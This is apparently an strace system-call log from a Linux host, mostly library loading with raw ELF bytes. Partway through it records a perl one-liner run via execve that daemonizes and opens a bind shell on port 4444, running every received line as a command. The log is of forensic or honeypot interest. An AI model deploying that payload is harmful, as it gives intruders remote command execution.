\0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

9987  07:30:49.904506 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

9987  07:30:49.904525 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7de5000

9987  07:30:49.904538 mmap2(0xb7dec000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7dec000

9987  07:30:49.904568 close(1)          = 0

9987  07:30:49.904580 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

9987  07:30:49.904594 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

9987  07:30:49.904608 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

9987  07:30:49.904696 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

9987  07:30:49.904714 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dcd000

9987  07:30:49.904728 mmap2(0xb7de1000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7de1000

9987  07:30:49.904744 mmap2(0xb7de3000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7de3000

9987  07:30:49.904758 close(1)          = 0

9987  07:30:49.904785 munmap(0xb7f73000, 29913) = 0

9987  07:30:49.904802 open("/etc/ld.so.cache", O_RDONLY) = 1

9987  07:30:49.904815 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

9987  07:30:49.904831 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f73000

9987  07:30:49.904841 close(1)          = 0

9987  07:30:49.904852 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

9987  07:30:49.904866 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

9987  07:30:49.904880 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

9987  07:30:49.904978 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

9987  07:30:49.904996 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dc3000

9987  07:30:49.905008 mmap2(0xb7dcb000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7dcb000

9987  07:30:49.905024 close(1)          = 0

9987  07:30:49.905037 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

9987  07:30:49.905050 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

9987  07:30:49.905065 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

9987  07:30:49.905155 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

9987  07:30:49.905172 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7db8000

9987  07:30:49.905183 mmap2(0xb7dc1000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7dc1000

9987  07:30:49.905199 close(1)          = 0

9987  07:30:49.905220 munmap(0xb7f73000, 29913) = 0

9987  07:30:49.905239 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

9987  07:30:49.905254 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

9987  07:30:49.905266 _llseek(1, 0, [0], SEEK_CUR) = 0

9987  07:30:49.905278 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

9987  07:30:49.905294 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7f7a000

9987  07:30:49.905305 _llseek(1, 1624, [1624], SEEK_SET) = 0

9987  07:30:49.905320 munmap(0xb7f7a000, 1624) = 0

9987  07:30:49.905330 close(1)          = 0

9987  07:30:49.905359 getpgrp()         = 3831

9987  07:30:49.905370 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

9987  07:30:49.905384 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

9987  07:30:49.905410 brk(0x8101000)    = 0x8101000

9987  07:30:49.905486 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

9987  07:30:49.905501 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

9987  07:30:49.905515 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

9987  07:30:49.905552 brk(0x8102000)    = 0x8102000

9987  07:30:49.905578 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

9987  07:30:49.905597 stat64("/sbin/AB", 0xbff735c8) = -1 ENOENT (No such file or directory)

9987  07:30:49.905609 stat64("/bin/AB", 0xbff735c8) = -1 ENOENT (No such file or directory)

9987  07:30:49.905621 stat64("/usr/sbin/AB", 0xbff735c8) = -1 ENOENT (No such file or directory)

9987  07:30:49.905633 stat64("/usr/bin/AB", 0xbff735c8) = -1 ENOENT (No such file or directory)

9987  07:30:49.905646 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

9987  07:30:49.905660 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7dee6f8) = 9988

9988  07:30:49.905707 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

9988  07:30:49.905723 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

9988  07:30:49.905736 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

9988  07:30:49.905748 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

9988  07:30:49.905763 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

9988  07:30:49.905779 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

9988  07:30:49.905792 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

9988  07:30:49.905849 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

9988  07:30:49.905863 --- SIGPIPE (Broken pipe) @ 0 (0) ---

9988  07:30:49.905941 exit_group(127)   = ?

9987  07:30:49.922203 rt_sigprocmask(SIG_SETMASK, [],  <unfinished ...>

4519  07:30:49.922259 waitpid(9987,  <unfinished ...>

9987  07:30:49.922317 <... rt_sigprocmask resumed> NULL, 8) = 0

9987  07:30:49.932139 --- SIGCHLD (Child exited) @ 0 (0) ---

9987  07:30:49.932250 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 9988

9987  07:30:49.932345 waitpid(-1, 0xbff73248, WNOHANG) = -1 ECHILD (No child processes)

9987  07:30:49.932391 sigreturn()       = ? (mask now [])

9987  07:30:49.932433 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

9987  07:30:49.932461 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

9987  07:30:49.932481 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

9987  07:30:49.932495 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

9987  07:30:49.932512 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

9987  07:30:49.932524 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

9987  07:30:49.932557 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

9987  07:30:49.932577 stat64("/sbin/perl", 0xbff735f8) = -1 ENOENT (No such file or directory)

9987  07:30:49.932589 stat64("/bin/perl", 0xbff735f8) = -1 ENOENT (No such file or directory)

9987  07:30:49.932600 stat64("/usr/sbin/perl", 0xbff735f8) = -1 ENOENT (No such file or directory)

9987  07:30:49.932612 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

9987  07:30:49.932629 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

9987  07:30:49.932654 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

9987  07:30:49.932669 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7dee6f8) = 9989

9989  07:30:49.932732 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

9989  07:30:49.932748 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

9989  07:30:49.932791 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

9989  07:30:49.932805 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

9989  07:30:49.932821 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

9989  07:30:49.932850 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

9989  07:30:49.932862 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

9989  07:30:49.932895 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

9989  07:30:49.932980 brk(0)            = 0x8153000

9989  07:30:49.932999 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

9989  07:30:49.933015 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f31000

9989  07:30:49.933030 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

9989  07:30:49.933046 open("/etc/ld.so.cache", O_RDONLY) = 1

9989  07:30:49.933058 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

9989  07:30:49.933075 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f29000

9989  07:30:49.933085 close(1)          = 0

9989  07:30:49.933095 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

9989  07:30:49.933110 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

9989  07:30:49.933124 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

9989  07:30:49.933213 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

9989  07:30:49.933230 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f25000

9989  07:30:49.933242 mmap2(0xb7f27000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f27000

9989  07:30:49.933357 close(1)          = 0

9989  07:30:49.933389 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

9989  07:30:49.933419 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

9989  07:30:49.933447 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

9989  07:30:49.933536 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

9989  07:30:49.933553 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f00000

9989  07:30:49.933564 mmap2(0xb7f23000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7f23000

9989  07:30:49.933580 close(1)          = 0

9989  07:30:49.933592 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

9989  07:30:49.933605 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

9989  07:30:49.933620 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

9989  07:30:49.933705 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

9989  07:30:49.933721 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7eff000

9989  07:30:49.933733 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ee7000

9989  07:30:49.933744 mmap2(0xb7efb000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7efb000

9989  07:30:49.933758 mmap2(0xb7efd000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7efd000

9989  07:30:49.933771 close(1)          = 0

9989  07:30:49.933782 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

9989  07:30:49.933795 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

9989  07:30:49.933809 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

9989  07:30:49.933938 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

9989  07:30:49.933956 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d98000

9989  07:30:49.933970 mmap2(0xb7ee1000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7ee1000

9989  07:30:49.933985 mmap2(0xb7ee4000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7ee4000

9989  07:30:49.933998 close(1)          = 0

9989  07:30:49.934010 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

9989  07:30:49.934023 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

9989  07:30:49.934036 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, 